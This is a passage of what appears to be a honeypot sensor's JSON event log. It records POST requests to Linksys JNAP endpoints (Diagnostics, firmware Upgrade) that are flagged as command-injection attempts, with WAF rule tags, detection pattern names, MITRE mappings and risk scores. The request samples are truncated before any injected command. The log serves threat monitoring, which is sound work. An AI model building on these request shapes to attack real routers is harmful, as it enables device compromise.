HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jn\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/JNAP\/\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950403:ssrf-2\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-2\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\/network\/Diagnostics\\r\\nContent-Length: 269\\r\\nConnection: close\\r\\n\\r\\n{\\\u0022JNAP\\\u0022:{\\\u0022action\\\u0022:\\\u0022http:\/\/linksys.com\/jnap\/network\/Diagnostics\u0022, \u0022payload_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jn\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u002221d62d4181c48365552b5c6e77fbad5ab0a5eecd\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/JNAP\/\u0022, \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jn\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/JNAP\/\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 82\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 82, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Cmdi\u0022, \u0022pat-0146\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/JNAP\/\u0022, \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/JNAP\/\u0022, \u0022evidence_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jn\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 11 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950403:ssrf-2\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022], \u0022behavior_alert_count\u0022: 1, \u0022behavior_priority\u0022: 72}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950403:ssrf-2\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":463},{"id":11809672,"ip":"45.153.34.252","ts":"2026-07-14 02:29:33.000000","proto":"tcp","src_port":47858,"dst_port":8081,"service":"http","classification":"cmd_injection","waf_score":66,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/JNAP\/","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 5, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u00221590bac5c7d7e8540ab87881f47e89fa381ce665\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 442, \u0022payload_entropy\u0022: 5.3857511832915606, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 82, \u0022tag_count\u0022: 15, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u002297f386438e263d9390fa75ffbd16dd75cf5514fd\u0022, \u0022event_fingerprint\u0022: \u0022fa4fb497c394ece581353e50ea95b8971050cbe3\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 142, \u0022precision_signals\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00224f2d27df216bd57db8422b4c9448fe8e\u0022, \u0022path_pattern_hash\u0022: \u002209d793525e81db3cecc4e36c738b6310\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 82}, \u0022payload_preview\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jn\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/JNAP\/\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\/firmware\/Upgrade\\r\\nContent-Length: 251\\r\\nConnection: close\\r\\n\\r\\n{\\\u0022JNAP\\\u0022:{\\\u0022action\\\u0022:\\\u0022http:\/\/linksys.com\/jnap\/firmware\/Upgrade\\\u0022,\\\u0022com\u0022, \u0022payload_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jn\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/JNAP\/\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\/firmware\/Upgrade\\r\\nContent-Length: 251\\r\\nConnection: close\\r\\n\\r\\n{\\\u0022JNAP\\\u0022:{\\\u0022action\\\u0022:\\\u0022http:\/\/linksys.com\/jnap\/firmware\/Upgrade\\\u0022,\\\u0022com\u0022, \u0022payload_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jn\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022bc1fbfea61111bc95ffda3969c8daf20458965d1\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/JNAP\/\u0022, \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jn\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/JNAP\/\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 82\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 82, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Cmdi\u0022, \u0022pat-0146\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/JNAP\/\u0022, \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/JNAP\/\u0022, \u0022evidence_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jn\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 10 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":442},{"id":11809670,"ip":"45.153.34.252","ts":"2026-07-14 02:29:32.000000","proto":"tcp","src_port":47838,"dst_port":8081,"service":"http","classification":"cmd_injection","waf_score":66,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/JNAP\/","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 5, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u00221590bac5c7d7e8540ab87881f47e89fa381ce665\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 428, \u0022payload_entropy\u0022: 5.369572556594604, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 82, \u0022tag_count\u0022: 15, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u002297f386438e263d9390fa75ffbd16dd75cf5514fd\u0022, \u0022event_fingerprint\u0022: \u0022fa4fb497c394ece581353e50ea95b8971050cbe3\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 142, \u0022precision_signals\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: 